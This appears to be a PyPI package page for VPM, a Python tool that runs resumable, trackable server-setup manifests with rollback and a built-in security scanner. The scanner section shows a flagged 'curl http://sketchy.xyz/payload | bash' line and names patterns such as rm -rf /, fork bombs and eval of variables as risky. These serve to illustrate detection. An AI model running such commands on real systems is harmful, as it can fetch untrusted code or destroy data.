Virtual Package Manager — resumable, trackable script orchestration for VPS and local environments

VPM — Virtual Package Manager

Resumable, trackable script orchestration for VPS and local environments.
Define steps. Run them. Resume if interrupted. Rollback if needed.


Why VPM?

You SSH into a server. You need to run 30+ commands to set up Docker, Nginx, firewall, SSL, your app. Halfway through, your connection drops.

With VPM:

  • Write once — Define steps in a simple manifest file
  • Resume anywhere — Interrupted? Just run vpm install again
  • Track everything — Every step's status, exit code, and full output logged
  • Stay safe — Built-in security scanner catches risky commands before execution
  • Undo mistakes — Rollback support reverses completed steps
  • Resolve dependencies — App B needs App A? VPM handles the order
  • Zero dependencies — Pure Python 3.10+ stdlib. Nothing to install but VPM itself

Install

pip install vpmx        # or: pipx install vpmx
vpm doctor              # verify everything works

60-Second Demo

# Create a project
mkdir ~/server-setup && cd ~/server-setup
vpm init

# Edit the manifest (or let an AI agent generate one)
nano vpm-manifest.yaml

# Preview what will run
vpm install --dry-run

# Scan for security issues
vpm audit

# Execute
vpm install

# Check status anytime
vpm status

Manifest Format

# vpm-manifest.yaml

[system_base] Core packages
- label: Update system
  run: sudo apt-get update -y && sudo apt-get upgrade -y

- label: Install essentials
  run: sudo apt-get install -y curl wget git htop
  rollback: sudo apt-get remove -y curl wget git htop

[docker] Docker Engine
requires: system_base

- label: Install Docker
  run: |
    curl -fsSL https://get.docker.com | sh
    sudo usermod -aG docker $USER
  rollback: sudo apt-get remove -y docker-ce

- label: Verify
  run: docker --version

That's it. The whole syntax is [app_name], requires:, label:, run: and rollback:. Full manifest docs →


Commands

Command                  What it does
vpm install              Execute manifest (resumes automatically)
vpm install --dry-run    Preview without executing
vpm audit                Security scan a manifest
vpm run <url>            Fetch & execute a remote manifest
vpm rollback <app>       Undo completed steps in reverse
vpm status               Show all tracked apps
vpm logs <app>           Browse execution logs
vpm retry <app>          Resume from failure point
vpm reset <app>          Clear tracking for fresh install
vpm doctor               Diagnose environment

Full commands reference →


Security Scanner

VPM scans manifests before execution — catching dangerous patterns automatically:

⚠ HIGH: Downloading and piping directly to shell interpreter
  Step 1: Install sketchy tool
    curl http://sketchy.xyz/payload | bash
  → Download first, inspect, then execute.

◐ MEDIUM: URL uses suspicious TLD: .xyz
  → Verify this domain is legitimate.

Severity    Examples
Critical    rm -rf /, fork bombs, disk formatting
High        curl | bash, eval $var, chmod 777
Medium      Unknown URLs, third-party repos, non-HTTPS
Low         sudo usage (expected but noted)

Configurable levels: strict, warn (default), permissive, off. Security docs →
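
A minimal sketch of this kind of pre-execution scan, added here as an illustration and not VPM's own code: the regexes, rule descriptions and the `parse_steps`/`scan` helpers are assumptions modelled on the severity table above, and the sample manifest is constructed from the page's own snippets. Note that the Docker step from the manifest example is itself flagged as a download piped to a shell.

```python
import re

# Constructed rules modelled on the page's severity table.
# The regexes are this example's assumptions, not VPM's real rule set.
RULES = [
    ("critical", "recursive delete of /", r"\brm\s+-(?:rf|fr)\s+/(?:\s|\*|$)"),
    ("high", "download piped to shell",
     r"\b(?:curl|wget)\b[^|;&\n]*\|\s*(?:sudo\s+)?(?:ba|z|da)?sh\b"),
    ("high", "eval of a variable", r"\beval\s+[^\n;|&]*\$"),
    ("high", "world-writable chmod", r"\bchmod\s+(?:-R\s+)?0?777\b"),
    ("medium", "non-HTTPS URL", r"\bhttp://"),
    ("medium", "suspicious TLD .xyz", r"https?://[^/\s]+\.xyz(?:[/:\s]|$)"),
    ("low", "sudo usage", r"\bsudo\b"),
]
ORDER = ["low", "medium", "high", "critical"]

def parse_steps(manifest):
    """Return [[label, command]] for each run: entry in the manifest syntax."""
    steps, label, in_block = [], None, False
    for line in manifest.splitlines():
        s = line.strip()
        if in_block and line.startswith("    "):
            steps[-1][1] += s + "\n"   # continuation of a `run: |` block
            continue
        in_block = False
        if s.startswith("- label:"):
            label = s[len("- label:"):].strip()
        elif s.startswith("run:"):
            cmd = s[len("run:"):].strip()
            in_block = cmd == "|"
            steps.append([label, "" if in_block else cmd])
    return steps

def scan(manifest):
    """Return [(severity, step label, rule description)], worst first."""
    findings = [(sev, label, desc)
                for label, cmd in parse_steps(manifest)
                for sev, desc, pattern in RULES
                if re.search(pattern, cmd, re.MULTILINE)]
    return sorted(findings, key=lambda f: -ORDER.index(f[0]))

SAMPLE = """\
- label: Install Docker
  run: |
    curl -fsSL https://get.docker.com | sh
    sudo usermod -aG docker $USER
  rollback: sudo apt-get remove -y docker-ce
- label: Install sketchy tool
  run: curl http://sketchy.xyz/payload | bash
"""
```

Only run: commands are scanned in this sketch; rollback: commands execute too and would need the same checks.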


Remote Manifests

Run manifests directly from URLs or GitHub repos:

vpm run https://example.com/setup.yaml
vpm run github:user/repo                    # fetches vpm-manifest.yaml
vpm run github:user/repo/path/file.yaml     # specific file

Security scanning is mandatory for remote manifests.


Crash Recovery

You:     vpm install          # starts running
SSH:     *disconnects*        # step 3 of 8 was running
You:     vpm install          # reconnect, run again
VPM:     Steps 1-2 ✔ skip    # already done
         Step 3 → re-run     # was interrupted
         Steps 4-8 → run     # continue normally

The lock file tracks every step atomically. No corruption, no re-running completed work.
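
One way a lock file can give this behaviour, as an added example rather than VPM's implementation: the JSON layout, the state names (`running`, `done`, `failed`) and all function names are assumptions. Each state change is written to a temporary file and renamed over the lock file, so an interrupted write leaves the previous state intact.

```python
import json
import os
import tempfile

def save_lock(path, state):
    """Write to a temp file, fsync, then rename over the old lock file.
    A crash leaves either the old or the new file, never a partial one."""
    directory = os.path.dirname(os.path.abspath(path))
    fd, tmp = tempfile.mkstemp(dir=directory, prefix=".lock-")  # mode 0600
    try:
        with os.fdopen(fd, "w") as f:
            json.dump(state, f)
            f.flush()
            os.fsync(f.fileno())
        os.replace(tmp, path)           # atomic rename
    except BaseException:
        if os.path.exists(tmp):
            os.unlink(tmp)
        raise

def load_lock(path):
    try:
        with open(path) as f:
            return json.load(f)
    except FileNotFoundError:
        return {}

def plan(state, labels):
    """Map each step to skip / re-run / run, as in the transcript above."""
    actions = {"done": "skip", "running": "re-run", "failed": "re-run"}
    return [(label, actions.get(state.get(label), "run")) for label in labels]

def install(path, steps, execute):
    """steps: [(label, command)]; execute(command) returns an exit code."""
    state = load_lock(path)
    for label, cmd in steps:
        if state.get(label) == "done":
            continue                    # completed in an earlier run
        state[label] = "running"
        save_lock(path, state)          # recorded before the command starts
        code = execute(cmd)
        state[label] = "done" if code == 0 else "failed"
        save_lock(path, state)
        if code != 0:
            break
    return state
```

A step left in the `running` state is executed again from the start, so commands in such a step need to be safe to repeat.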


Examples

Real-world manifests in examples/:


For AI Agents

VPM is designed to work with AI assistants. Ask your AI to "create a VPM manifest to set up X" and it works.

  • AGENTS.md — Concise reference for AI context windows
  • llms.txt — Ultra-condensed reference

Documentation

Guide                  What's covered
Manifest Format        Syntax, apps, steps, dependencies, multi-line commands
Commands Reference     All CLI commands with flags and examples
Security & Rollback    Scanner config, rollback system, remote manifests
How It Works           Lock file, step states, crash recovery, change detection
Execution Model        PTY execution, interactive support, file locations
Writing Manifests      Best practices, patterns, anti-patterns, AI agent guidelines
Troubleshooting        Common issues, fixes, architecture overview

Contributing

See CONTRIBUTING.md. No external dependencies — pure Python stdlib.

License

MIT — Mohammed A. Al-Kebsi

Download files

Source Distribution

vpmx-1.2.2.tar.gz (43.5 kB view details)

Uploaded Source

Built Distribution

vpmx-1.2.2-py3-none-any.whl (41.3 kB view details)

Uploaded Python 3

File details

Details for the file vpmx-1.2.2.tar.gz.

File metadata

  • Download URL: vpmx-1.2.2.tar.gz
  • Upload date:
  • Size: 43.5 kB
  • Tags: Source
  • Uploaded using Trusted Publishing? Yes
  • Uploaded via: twine/6.1.0 CPython/3.13.12

File hashes

Hashes for vpmx-1.2.2.tar.gz
Algorithm Hash digest
SHA256 86227369af5ca1dc3769386b19745687b097dad33ff71c6503389e04dc10e136
MD5 9f1a79987090388baeb6bf8ba3163a0c
BLAKE2b-256 ce5fdc384b44e8687d4f12198baa87278b680771c3da67a473cf943294768e03

Provenance

The following attestation bundles were made for vpmx-1.2.2.tar.gz:

Publisher: publish.yml on Nao-30/vpm

Attestations: Values shown here reflect the state when the release was signed and may no longer be current.

File details

Details for the file vpmx-1.2.2-py3-none-any.whl.

File metadata

  • Download URL: vpmx-1.2.2-py3-none-any.whl
  • Upload date:
  • Size: 41.3 kB
  • Tags: Python 3
  • Uploaded using Trusted Publishing? Yes
  • Uploaded via: twine/6.1.0 CPython/3.13.12

File hashes

Hashes for vpmx-1.2.2-py3-none-any.whl
Algorithm Hash digest
SHA256 23ed73956ad73d4258d5a035511cf582b0c8f39fee8465591cfd95f77db9ad3d
MD5 23997fb2258d2b55337dc008c4f0e385
BLAKE2b-256 72557775c33ba56c07506447533fc0789c5093c755666be071c74cecbd369577

Provenance

The following attestation bundles were made for vpmx-1.2.2-py3-none-any.whl:

Publisher: publish.yml on Nao-30/vpm

Attestations: Values shown here reflect the state when the release was signed and may no longer be current.
